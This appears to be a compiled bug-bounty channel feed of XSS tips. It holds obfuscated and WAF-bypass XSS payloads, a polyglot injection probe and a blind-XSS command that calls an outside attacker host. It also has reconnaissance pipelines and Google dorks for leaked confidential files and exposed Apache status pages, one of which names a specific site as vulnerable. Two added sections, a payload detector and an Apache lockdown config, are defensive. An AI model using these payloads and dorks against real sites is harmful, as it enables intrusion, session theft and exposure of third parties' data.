XSS Tip: If alert() is being converted to ALERT(), you can use something like:
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
Payload for XSS + SQLi + SSTI/CSTI !
'"><noscript/onload=prompt(5);>{{7*7}}
XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
Blind XSS In X-Forwarded-For Header
subfinder -d target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"
🫡Automate Your XSS
#!/bin/bash
# Root domain to assess is read from stdin (e.g. example.com)
read -r TARGET
# Enumerate subdomains and keep a copy on disk
subfinder -d "$TARGET" -silent | tee domains.txt
# Collect archived URLs for every subdomain
waybackurls < domains.txt | tee waybackurls.txt
# Feed the collected URLs to dalfox for XSS scanning
dalfox pipe < waybackurls.txt
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
New Xss Fly Under Radar Cloudflare Bypass 🧱
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
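Both Cloudflare-bypass payloads above, like the ALERT() tip earlier that avoids the literal word alert altogether, defeat filters that look for one fixed keyword after a single decode. The following is an added example, not from any post in this channel, of a check that decodes repeatedly, normalises case and the "/" attribute separator, and matches on the presence of an event-handler attribute instead of a keyword; the sample inputs are constructed from the payloads above (the <input> one shortened).

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the mixed-case SVG payload, a shortened copy of the
# triple-URL-encoded <input> payload, and a benign HTML fragment.
SAMPLES = {
    "svg_mixed_case": "%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E",
    "input_triple_encoded":
        '"><input%252bTyPE%25253d"x"%252boNMoUseOVer%25253d"alert(1)"%252bAuToFOcus>',
    "benign": "%3Cb%3Ehello%3C%2Fb%3E",
}

# A tag, any attribute text, then a known event-handler attribute.
# Case-insensitive, because the payloads rely on oNlOAD / oNMoUseOVer.
EVENT_HANDLER = re.compile(
    r"<\s*[a-z][\w:-]*[^>]*?\bon(?:load|error|focus|blur|mouseover|click|toggle)\s*=",
    re.IGNORECASE,
)


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """URL-decode (with '+' as space) until the text stops changing.

    %25253d needs three rounds to become '='; the bound stops hostile input
    from keeping the loop busy.
    """
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def naive_match(value: str) -> bool:
    """One decode, exact lower-case keywords: the kind of rule these payloads bypass."""
    once = unquote_plus(value)
    return "<svg onload=" in once or "<input onmouseover=" in once


def normalized_match(value: str) -> bool:
    """Decode fully, treat '/' as whitespace (so <SVG/ONLOAD parses as a
    tag plus attribute), then look for any event-handler attribute."""
    text = fully_decode(value).replace("/", " ")
    return EVENT_HANDLER.search(text) is not None
```

Run over SAMPLES, naive_match misses both payloads while normalized_match flags them and leaves the benign fragment alone.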
📢An XSS payload, cuneiform-alphabet based!
This payload was on trend back in 2020, but it still works :)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()
(Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
Google Dork - Sensitive Docs 📄
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:"confidential" | intext:"Not for Public Release" | intext:"internal use only" | intext:"do not distribute"
Google Dork - Server Errors ⚡
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
https://youtu.be/cfs5pWh5jqM?si=pEyqVQ6SctrnzI7C
DM For Live Class Enrollment
https://wa.me/918945971332
Dork: Apache Server Leakage
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Vulnerable Site- https://www.itronot.co.il/server-status
inurl:server-status "apache server status" "cpu usage"
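The dork above finds mod_status pages left readable by anyone. As an added example, not taken from the linked article, this is the Apache 2.4 configuration that keeps /server-status reachable for operators only; the 10.0.0.0/8 range is an assumed management network, substitute your own.

```apache
# Keep mod_status available, but only from loopback and an assumed
# management network (10.0.0.0/8 is a placeholder for your own range).
<IfModule mod_status.c>
    <Location "/server-status">
        SetHandler server-status
        # Several Require lines at the same level are OR-ed (RequireAny)
        Require local
        Require ip 10.0.0.0/8
    </Location>
    # ExtendedStatus adds per-request URLs and client addresses to the
    # page, which is what the dork is hunting for; leave it off unless the
    # Location above is access-restricted.
    ExtendedStatus Off
</IfModule>
```

After a reload, a request for /server-status from outside the allowed ranges should return 403 rather than the worker table.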
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.
Dork: site:*.example.com inurl:login | inurl:signin Google